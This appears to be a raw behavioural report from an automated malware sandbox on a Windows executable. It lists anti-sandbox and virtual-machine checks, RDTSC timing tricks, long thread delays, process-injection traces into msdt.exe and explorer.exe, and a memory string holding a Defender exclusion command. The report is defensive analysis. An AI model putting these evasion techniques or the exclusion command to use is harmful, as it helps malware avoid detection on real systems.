Source: Yara match File source: Process Memory Space: HkE0tD0g4NXKJfy.exe PID: 5624, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000002D08604 second address: 0000000002D0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000002D0899E second address: 0000000002D089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916 Thread sleep count: 576 > 30
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239841s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916 Thread sleep count: 2157 > 30
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6132 Thread sleep time: -30220s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239718s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239610s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239499s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239391s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239266s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -239094s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238968s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238844s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238733s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238609s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238500s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238390s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -238157s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -237547s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -237110s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -236750s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756 Thread sleep time: -236641s >= -30000s
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 4676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6524 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_004088D0 rdtsc 7_2_004088D0
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239841
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239718
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239610
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239499
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239391
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239266
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239094
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238968
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238844
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238733
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238609
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238500
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238390
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238157
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 237547
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 237110
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 236750
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 236641
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Window / User API: threadDelayed 576
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Window / User API: threadDelayed 2157
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239841
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 30220
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239718
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239610
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239499
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239391
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239266
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 239094
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238968
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238844
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238733
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238609
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238500
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238390
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 238157
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 237547
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Thread delayed: delay time: 237110
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236750Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236641Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWa Connection* 4
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000A.00000000.323358278.000000000EE50000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yb3d8bb
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmp, msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0199D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01903A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01974257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
